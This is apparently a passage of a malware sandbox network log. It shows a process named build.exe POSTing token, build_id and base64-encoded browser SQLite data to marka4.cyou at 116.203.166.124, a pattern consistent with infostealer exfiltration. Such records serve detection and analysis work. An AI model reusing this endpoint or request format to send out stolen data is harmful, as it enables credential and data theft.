2025-01-11 22:00:19 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:19 UTC	16355	OUT	Data Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56 Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
2025-01-11 22:00:19 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:19 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:19 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:19 UTC	11617	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:21 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 22:00:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-11 22:00:21 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49771	116.203.166.124	443	7144	C:\Users\user\Desktop\build.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:20 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----16pp890hdjm7qq1v3oh4 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: marka4.cyou Content-Length: 493 Connection: Keep-Alive Cache-Control: no-cache
2025-01-11 22:00:20 UTC	493	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 36 70 70 38 39 30 68 64 6a 6d 37 71 71 31 76 33 6f 68 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 62 39 64 33 64 30 62 34 64 36 34 65 64 66 38 32 65 36 39 63 64 63 31 35 38 62 34 36 31 64 65 0d 0a 2d 2d 2d 2d 2d 2d 31 36 70 70 38 39 30 68 64 6a 6d 37 71 71 31 76 33 6f 68 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 64 39 63 30 33 64 66 63 63 31 37 65 33 63 31 62 65 39 61 63 61 62 34 31 30 30 61 36 39 35 30 0d 0a 2d 2d 2d 2d 2d 2d 31 36 70 70 38 39 30 68 64 6a 6d 37 71 71 31 76 33 6f 68 34 0d 0a 43 6f 6e 74 Data Ascii: ------16pp890hdjm7qq1v3oh4Content-Disposition: form-data; name="token"7b9d3d0b4d64edf82e69cdc158b461de------16pp890hdjm7qq1v3oh4Content-Disposition: form-data; name="build_id"7d9c03dfcc17e3c1be9acab4100a6950------16pp890hdjm7qq1v3oh4Cont
2025-01-11 22:00:21 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 22:00:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-11 22:00:21 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49772	116.203.166.124	443	7144	C:\Users\user\Desktop\build.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:21 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----glfuas2v3w47yukxbasj User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: marka4.cyou Content-Length: 169765 Connection: Keep-Alive Cache-Control: no-cache
2025-01-11 22:00:21 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 67 6c 66 75 61 73 32 76 33 77 34 37 79 75 6b 78 62 61 73 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 62 39 64 33 64 30 62 34 64 36 34 65 64 66 38 32 65 36 39 63 64 63 31 35 38 62 34 36 31 64 65 0d 0a 2d 2d 2d 2d 2d 2d 67 6c 66 75 61 73 32 76 33 77 34 37 79 75 6b 78 62 61 73 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 64 39 63 30 33 64 66 63 63 31 37 65 33 63 31 62 65 39 61 63 61 62 34 31 30 30 61 36 39 35 30 0d 0a 2d 2d 2d 2d 2d 2d 67 6c 66 75 61 73 32 76 33 77 34 37 79 75 6b 78 62 61 73 6a 0d 0a 43 6f 6e 74 Data Ascii: ------glfuas2v3w47yukxbasjContent-Disposition: form-data; name="token"7b9d3d0b4d64edf82e69cdc158b461de------glfuas2v3w47yukxbasjContent-Disposition: form-data; name="build_id"7d9c03dfcc17e3c1be9acab4100a6950------glfuas2v3w47yukxbasjCont
2025-01-11 22:00:21 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:21 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:21 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:21 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:21 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:21 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:21 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:21 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:21 UTC	16355	OUT	Data Raw: 55 67 51 6b 39 50 54 45 56 42 54 69 42 45 52 55 5a 42 56 55 78 55 49 45 5a 42 54 46 4e 46 49 45 35 50 56 43 42 4f 56 55 78 4d 4b 56 41 45 42 68 63 72 4b 77 46 5a 64 47 46 69 62 47 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 46 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 4e 78 62 47 6c 30 5a 56 39 7a 5a 58 46 31 5a 57 35 6a 5a 53 68 75 59 57 31 6c 4c 48 4e 6c 63 53 6d 42 66 77 4d 48 46 78 55 56 41 59 4e 68 64 47 46 69 62 47 56 31 63 6d 78 7a 64 58 4a 73 63 77 52 44 55 6b 56 42 56 45 55 67 56 45 46 43 54 45 55 67 64 58 4a 73 63 79 68 70 5a 43 42 4a 54 6c 52 46 52 30 56 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 49 45 46 56 56 45 39 4a 54 6b 4e 53 52 55 31 46 54 Data Ascii: UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2VzcWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNhdGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT
2025-01-11 22:00:23 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 22:00:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49773	116.203.166.124	443	7144	C:\Users\user\Desktop\build.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:22 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----phdj5fc2ngvaaaimy5xl User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: marka4.cyou Content-Length: 66001 Connection: Keep-Alive Cache-Control: no-cache
